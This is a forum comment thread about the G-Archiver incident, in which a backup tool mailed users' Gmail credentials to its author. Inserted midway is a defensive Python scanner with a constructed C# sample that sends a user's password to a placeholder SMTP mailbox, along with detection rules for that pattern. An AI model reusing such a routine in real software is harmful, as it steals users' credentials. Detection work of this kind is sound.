It's either an honest mistake, or a REALLY poor hack attempt. Unless I've given further information, I'm inclined to think it was an honest mistake.

Adamn

Re:Doesn't look malicious to me (1)

Seiruu (808321) | more than 6 years ago | (#22720000)

John Terry, of the G-Archiver software had left his own email information in the code
Yes, because getting your own gmail account is so hard these days.

Yes, the G-archiver forwarded a record of the account information of everyone who used the app to that mailbox, but if you look at the screenshot, none of those emails has been flagged as read by gmail (but maybe that's an artifact of a POP connection?).
What is missing in the article is this guy checking whether that gmail account has been set to "auto forward incoming emails to x account while leaving a copy behind". In that case, he could simply read these e-mails from a dif email account with none the wiser.

Deleted the emails (4, Insightful)

gorre (519164) | more than 6 years ago | (#22719852)

From the Information Week article:

Brooks said he then deleted the presumably stolen account information, changed the password on the account, and notified Google.
[...]
Google's statement continues. "We are investigating this incident, the underlying activities of which violate Gmail Program Policies. We have suspended the suspect account, and are in the process of notifying the owners of those accounts whose passwords may have been compromised. It's unfortunate that fraudsters continue to use email for these purposes. We have phishing detection capabilities built into Gmail, so we were able to act quickly to limit the impact of this particular attack."
I have never read Google's Privacy Policy but am slightly concerned that they appear to be able to access emails after their deletion.

Re:Deleted the emails (1)

Adradis (1160201) | more than 6 years ago | (#22720032)

Doesn't necessarily have to be the email itself. Assuming the account is used solely for password dumps, they probably have a record somewhere of emails sent to the account, and perhaps the subject line?

This is why... (2, Interesting)

Thelasko (1196535) | more than 6 years ago | (#22719896)

I stopped using shareware and only use open source software. You never know what kind of crap the programmer might have stuck in there unless you can read the source yourself.
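Reading the source yourself, as this comment suggests, is exactly how the G-Archiver behaviour was found: a decompiled binary showed an embedded mailbox login and a routine that mailed the user's credentials to it. The following is an added example of the kind of check a reviewer can run over decompiled or vendored source to flag that pattern. It is not code from the page or from G-Archiver; the sample "decompiled" routine, the addresses, host name and password in it are constructed placeholders, and the rules key on .NET mail classes (SmtpClient, NetworkCredential, MailMessage) only because the tool was a Windows application.

```python
import re
from typing import Dict, List

# Constructed sample of what a decompiled C# "report" routine from a backup tool
# might look like. Every identifier and value here is invented for the example.
SAMPLE_DECOMPILED = r'''public static void SendReport(string user, string pass)
{
    MailMessage msg = new MailMessage();
    msg.From = new MailAddress("report-bot@example.com");
    msg.To.Add("report-bot@example.com");
    msg.Subject = "account";
    msg.Body = "user=" + user + " pass=" + pass;
    SmtpClient client = new SmtpClient("smtp.example.com", 587);
    client.Credentials = new NetworkCredential("report-bot@example.com", "hunter2-placeholder");
    client.Send(msg);
}'''

# Each rule is (finding kind, regex). Named groups capture the evidence.
RULES = [
    # Login literal pair embedded in the binary: the debug-leftover smell.
    ("hardcoded_credential",
     re.compile(r'NetworkCredential\(\s*"(?P<user>[^"]*)"\s*,\s*"(?P<secret>[^"]*)"')),
    # Outbound mail connection to a fixed host.
    ("outbound_smtp",
     re.compile(r'new\s+SmtpClient\(\s*"(?P<host>[^"]+)"')),
    # A variable that looks like a password flows into a mail body.
    ("secret_in_mail_body",
     re.compile(r'\.Body\s*=.*\b(?P<var>pass(?:word)?|pwd|secret)\b', re.I)),
    # Fixed recipient: every run reports to the same mailbox.
    ("hardcoded_recipient",
     re.compile(r'\.To\.Add\(\s*"(?P<addr>[^"]+)"')),
]


def mask(secret: str) -> str:
    """Never echo a recovered secret in a report; keep only length and end characters."""
    if len(secret) <= 2:
        return "*" * len(secret)
    return secret[0] + "*" * (len(secret) - 2) + secret[-1]


def scan(source: str) -> List[Dict[str, object]]:
    """Run every rule over every line; return one finding per (line, rule) hit."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for kind, rx in RULES:
            m = rx.search(line)
            if not m:
                continue
            detail = {k: (mask(v) if k == "secret" else v)
                      for k, v in m.groupdict().items() if v is not None}
            findings.append({"line": lineno, "kind": kind, **detail})
    return findings


def assess(findings: List[Dict[str, object]]) -> str:
    """Combine individual hits into a verdict a reviewer can act on."""
    kinds = {f["kind"] for f in findings}
    if {"hardcoded_credential", "outbound_smtp", "secret_in_mail_body"} <= kinds:
        return "credential-exfiltration pattern: user secret mailed out via embedded account"
    if "hardcoded_credential" in kinds:
        return "hardcoded credential: review, possible debug leftover"
    return "no mail-based credential handling found"


if __name__ == "__main__":
    hits = scan(SAMPLE_DECOMPILED)
    for h in hits:
        print(h)
    print(assess(hits))
```

The three-way combination in assess() is the point: a hardcoded login on its own is often just careless, but a hardcoded login plus an outbound mail client plus a password variable in the message body is the shape of the G-Archiver case, and that combination is what should block a release or trigger a deeper look. The masking in mask() matters too, since a scanner that prints recovered passwords into CI logs just moves the leak.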

What a dumbass (1)

tangent3 (449222) | more than 6 years ago | (#22719996)

There are better ways to email someone's userid and password to yourself without giving away your own password.
Like SMTP.